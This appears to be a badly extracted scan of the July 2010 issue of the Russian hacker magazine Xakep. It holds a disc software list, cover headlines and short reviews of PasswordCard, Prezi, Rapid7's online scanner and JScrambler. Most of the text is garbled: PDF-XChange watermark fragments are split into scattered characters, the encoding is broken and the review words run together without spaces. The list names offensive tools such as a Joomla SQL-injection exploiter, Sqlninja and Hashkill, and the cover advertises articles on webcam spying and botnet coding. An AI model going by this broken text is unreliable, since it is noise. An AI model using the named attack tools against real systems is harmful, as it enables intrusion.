Cdrtools 3.0.0
DirSync Pro 1.3
DockBarX 0.39
Dynamic Window Manager 5.8
Emacs 23.2
Evince 2.30.1
FFmpeg 0.5.2
Fotoxx 10.4
F-Spot 0.6.2
KOffice 2.2
MC 4.7.2
MythTV 0.23
Parole 0.2.0.2
PeaZip 3.1
Sweet Home 3D 2.4
Xfce 4.6.2
>Devel
Akshell 0.2
Android NDK R4
Android SDK R6
Apache Rivet 2.0
Arcadia 0.8.1
Automake 1.11.1
Bviplus 0.9.4
db4o 8
Django 1.2
Execute Query 3.2.1
jMonkeyEngine3 SDK alpha
JRuby 1.5.0
Native Client SDK
Qt 4.6.2
Rubinius 1.0
Smalltalk 3.2
Spket IDE 1.6.18
xmlsec1 1.2.16
ADT 0.9.7
>Games
The Battle for Wesnoth 1.8.2
>Net
Google Chrome 5.0.375.55
KTorrent 4.0
Midori 0.2.6
Pidgin 2.7.1
EiskaltDC++ 2.0.2
RTMPdump 2.2e
Mozilla Firefox 3.6.3
Dropbox 0.6.571
Mozilla Thunderbird 2.0.0.24
NetworkManager 0.8
Pino 0.2.10
Opera 10.10
gPodder 2.6
Konversation 1.2.3
GoldenPod 0.8.3
SIM IM 0.9.4.3
Xchat 2.8.8
Lightspark 0.4.0
>Security
LFT 3.1
Nufw 2.4.2
OpenScap 0.5.11
Suricata 0.9.1
Keychain 2.7.1
Whatweb 0.4.3
Joomla sqli sploiter
Column finder
Darkjumper 5.7
Iptables 1.4.8
Clamav 0.96.1
Metasploit Framework 3.4.0
Hashkill 0.2.0
Ctunnel 0.3
Graudit 1.6
Xplico 0.5.7
Sqlninja 0.2.5
iScanner 0.5
Complemento 0.7.6
Samhain 2.7.0
Authfail 1.1.7
>Server
Sipwitch 0.8.3
Cherokee Webserver 1.0.1
Adchpp 2.5
Kamailio 3.0.2
Radmind 1.13.0
Fapws3 0.5
Socks Server5 3.8.2
LFTP 4.0.8
RabbIT 4.6
Ziproxy 3.0.1
MySQL 5.1.47
Apache 2.2.15
BIND 9.7.0
CUPS 1.4.3
DHCP 4.1.1
OpenLDAP 2.4.22
OpenSSH 5.5
OpenVPN 2.1.1
Sendmail 8.14.4
Asterisk 1.6.2
>System
ATI Catalyst 10.5
VMWare Workstation 7.1
XNeur+gXNeur 0.9.9
SystemRescueCd 1.5.4
Open vSwitch 1.0.0
VirtualBox 3.2.2
ZFS-Fuse 0.6.0
Linux Kernel 2.6.34
DOSBox 0.74
Ganeti 2.1.2
Memtest86+ 4.10
nVidia 195.36.24
YASMon 0.0.5
OpenAFS 1.4.12.1
ROXTerm 1.18.3
Wine 1.0.1
Wmc2d 2.03
№ 07(138)ИЮЛЬ 2010
x
ПОДГЛЯДЫВАЕМ ЧЕРЕЗ WEB-КАМЕРУ СТР. 110
|
|
w |
w |
|
|
D |
|||
|
w |
|
|
|
|
P |
|
|
|
|
|
|
|
|
|
|
F |
||
|
. |
|
|
|
|
|
|
||
|
p |
Click |
|
|
|
|
|
- |
|
|
f |
|
|
|
|
|
X |
||
|
d |
|
|
|
|
|
|
|
|
|
- |
|
to |
|
|
|
|
C |
|
|
x |
|
|
|
|
|
h |
||
|
c |
|
|
BUY |
|
|
|
a |
|
|
h |
|
|
|
|
|
n |
||
РЕКОМЕНДОВАННАЯ |
|
|
|
|
|
g |
|||
|
a |
|
|
|
|
|
|
|
|
|
|
|
|
NOW! |
|
e |
|||
|
n |
|
|
|
|
||||
|
|
|
|
|
|
|
|
E |
|
|
g |
|
|
|
|
|
|
|
|
|
e |
|
|
|
|
|
|
|
d |
ЦЕНА |
. |
|
|
|
|
|
|
|
i |
c |
|
|
|
|
|
|
|||
o |
|
|
|
|
|
t |
|||
|
|
m |
|
|
r |
o |
|
||
|
|
|
|
|
|
|
|
|
|
: |
|
|
|
|
|
|
|
|
|
210 |
|
|
|
|
|
|
|
|
|
|
р |
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
|
|
|
|
ИЮЛЬ 07 (138) 2010 |
AMAZON S3 |
|||
|
|
|
|
|
ОБЛАЧНЫЕ ТЕХНОЛОГИИ ДЛЯ |
|
|
|
|
|
ХРАНЕНИЯ ФАЙЛОВ И БЭКАПА |
|
|
|
|
|
ÑÒÐ. 26 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
ÑÒÐ. 52
|
|
|
|
НЕГАСИМЫЙ |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
ÂÑÅ |
|
ФАЗЗИНГЕ |
|
|
|
|
|
|
|
|
|||
Î |
|
|
|
|
|
|
|
|
|||||
ОБЗОР БЕСПЛАТНЫХ |
БОТНЕТ |
|
|
|
|
|
|
|
|
||||
И ФАЗЗЕРАХ |
|
|
|
|
|
|
|
|
|
|
|||
АНТИВИРУСОВ |
КОДИНГ НЕУБИВАЕМЫХ И |
|
|
|
|
|
|
|
|
||||
АТАКА НА LOTUS DOMINO |
|
|
|
|
|
|
|
|
|||||
АБУЗОУСТОЙЧИВЫХ БОТОВ |
|
|
|
|
|
|
|
|
|||||
ИСТОРИЯ SKYPE |
|
|
|
|
|
|
|
|
|||||
ÑÒÐ. 107 |
|
|
|
|
|
|
|
|
|||||
|
|
|
|
w |
w |
w |
|
|
|
P |
|
|
|
|
|
|
|
|
|
|
D |
||||||
|
|
|
|
|
|
|
|
||||||
|
|
|
|
|
|
|
|
|
|
|
F |
||
|
|
|
|
. |
|
|
|
|
|
|
|
||
|
|
|
|
p |
|
|
|
|
|
|
|
|
- |
|
|
|
|
d |
|
|
|
|
|
|
|
|
X |
|
|
|
|
f Click |
|
|
|
|
|
C |
|||
|
|
|
|
- |
|
|
to |
|
|
|
|
||
|
|
|
|
x |
|
|
|
|
|
|
h |
||
|
|
|
|
c |
|
|
|
BUY |
|
|
|
a |
|
|
|
|
|
h |
|
|
|
|
|
|
n |
||
|
|
|
|
|
|
|
|
|
|
g |
|||
|
|
|
|
a |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
NOW! |
|
e |
|||
|
|
|
|
n |
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
E |
||||
|
|
|
|
g |
|
|
|
|
|
||||
|
|
|
|
e |
|
|
|
|
|
d |
|||
|
|
|
|
. |
|
|
|
|
|
|
|
|
i |
|
|
|
|
c |
|
|
|
|
|
|
|
||
|
|
|
|
o |
|
|
|
|
|
|
t |
||
|
|
|
|
m |
|
|
|
r |
o |
|
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
r |
|
|
||
P |
|
|
|
|
|
NOW! |
o |
|
|
|||
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
to |
|
|
|
|
|
UNITS |
|
||
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|||
w Click |
|
|
|
|
|
o |
m |
|
|
|||
|
w |
|
|
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
|
.c |
|
|
|
|
|
|
p |
|
|
|
|
|
HTTP:// |
||||
|
|
|
|
|
|
g |
|
|
|
|
||
|
|
|
df |
|
n |
e |
|
|
|
|||
|
|
|
|
-xcha |
|
|
|
|
|
|
WWW2
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
Простой способ запомнить пароли
Создаем эффектные
PASSWORDCARD PREZI презентации www.passwordcard.org www.prezi.com
Сделатьодиннадежныйпароль(аляb15DbaL) — легко. Нопопробуй удержатьвголовепаролидлявсехсервисовсразу! Чтобыпоборотьжеланиевездеиспользоватьодинитотжепасс, естьнескольковыходов. Да, можнодоверитьпароликакому-тостороннемусервису, обращаяськнему каккшпаргалке. Аможнопойтинамаленькуюхитрость. ИдеязаключаетсявиспользованиитакназываемойPasswordCard — небольшойкарточкистаблицейсимволов, которуючастовыдаютклиентамонлайн-банка вфинансовыхучреждениях. Каждаястрокатаблицыимеетсвойцвет, а каждыйстолбецобозначензапоминающимсясимволом. Выбраводнуиз пар«цвет-символ», мыполучаемпервыйсимволпароля, адальшедля егосоставленияиспользуемкакой-нибудьпростойпринцип, например, выписываемсимволыподиагонали. Врезультатеполучаетсянадежный пароль, требующийминимуминформациидлязапоминания, икарточка, которуюможнобезопаснодержатьприсебе. Сгенерироватьуникальную карточкупоключевомусловукакразипоможетсервисPasswordCard.
КогдаребятаизMicrosoft нахваливаютновыеэффекты, которыепоявилисьвPowerPoint 2010 длясозданияпрезентаций, вответостаетсятолькоулыбаться. Виделибыонипрезенташки, которыепозволяетсоздать онлайн-сервисPrezi :). Восновесервисалежитоднаоченьпростаяидея: вседанныедляслайдовразмещаютсянаодномоченьбольшомполотне, апереходмеждуслайдамиосуществляетсяспомощьюэффектного перемещенияточкиобзора. Принеобходимостикамера, смотрящая наэтополотно, отдаляется, чтобыпоказатьбольшеинформации, или приближается, чтобыакцентироватьвниманиенанекоторыедетали. Эффективностьтакойпрезентациисложнопередатьсловами, ноесли тыпосмотришьпримерынасайте, тосразузахочешьиспользоватьее,
чтобыслучшейстороныпредставитьсвойкурсач, дипломили, возможно, проектстартападлявенчурногоинвестора:).
Коммерческий сканер безопасности онлайн
RAPID7 ONLINE SCAN rapid7.com/freescan.jsp
КомпанияRapid7, специализирующаянаинформационнойбезопасности, известнатем, чтоприобрелапроектMetasploit ивкладывает
внегобольшиеденьги. Вместестем, главнымпроектомкомпании остаетсясканербезопасностиRapid7 NeXpose. Несмотрянато, что продуктпродаетсязабольшиеденьги(хотяунегоиестьурезаннаябесплатнаяверсия), каждыйможетпопробоватьеговдействии, натравив насерверысвоейкомпании(да-да-да). Зарегистрировавшисьнасайте, тыполучаешьвозможностьпросканироватьонлайн-версиейсканера двахоста. Приэтомничегоустанавливатьнепотребуется, весьсофт работаетнасторонеразработчиков. Сканированиеможетзанятьнекотороевремя, нотебедаженеобязательнождать: простозайдивличный кабинетчерезнекотороевремяиищиподробныйотчетосканировании
вразделеReports.
Обфускация кода на
Javascript
JSCRAMBLER www.jscrambler.com
НасвоейежегоднойконференцииGoogle I/O сотрудникипоискового гигантазаявили: с2004 годаневыходилониоднойзначимойдесктопной программы. Подкрепляясвоисловаобабсолютномпревосходствевебплатформы, онидажеоткрылимагазиндляпродажионлайн-приложений (онпокадоступентолькокорпоративнымпользователямGoogle). Но еслидлязащитыдесктопныхпрограммсуществуетнемалокрипторови обфускаторов, тозащититьклиентскуючастьвеб-приложения, написанную, какправило, наJavaScript, довольносложно. Чтобыуберечьсорцы отплагиата, приходитсяприменятьтакназываемыескрамблеры, которые чрезвычайноусложняютчтениекода. Существуетмногобестолковыхрешений, новот-вотпоявитсядостойныйобфускатор— проектJScrambler. Разработчикиужесейчаспредлагаютбета-тестерамнесколькоуникаль- ныхалгоритмов, спомощьюкоторыхскрамблерделаетсорцынечитаемыми. Да, открытыйдоступпоказакрыт, норазработчикиактивнорассылают приглашенияпопервомузапросу.
144 |
XÀÊÅÐ 07 /138/ 10 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
P |
|
|
|
|
|
NOW! |
o |
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
w Click |
to |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
m |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
. |
|
|
|
|
|
.c |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
|
|
|
|
X |
|
|
|
|
|
|||
|
|
|
|
|
- |
|
|
|
|
|
d |
|
||
|
|
|
|
|
F |
|
|
|
|
|
|
t |
|
|
|
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
|
r |
||
|
|
|
|
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
|||||
|
|
|
|
|
|
|
|
|
||||||
|
|
|
w |
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
|
|
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
|
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|||
|
|
|
C |
|
|
|
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
|
|
d |
|
|
||
|
F |
|
|
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
r |
|
||
P |
|
|
|
|
|
|
NOW! |
o |
|
||||
|
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
BUY |
|
|
|
|||||
|
|
|
|
to |
|
|
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
|
m |
|
||||
|
|
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
|
|
|
.c |
|
|
||
|
|
p |
|
|
|
|
|
|
g |
|
|
|
|
|
|
|
df |
|
|
|
|
n |
e |
|
|
||
|
|
|
|
-xcha |
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|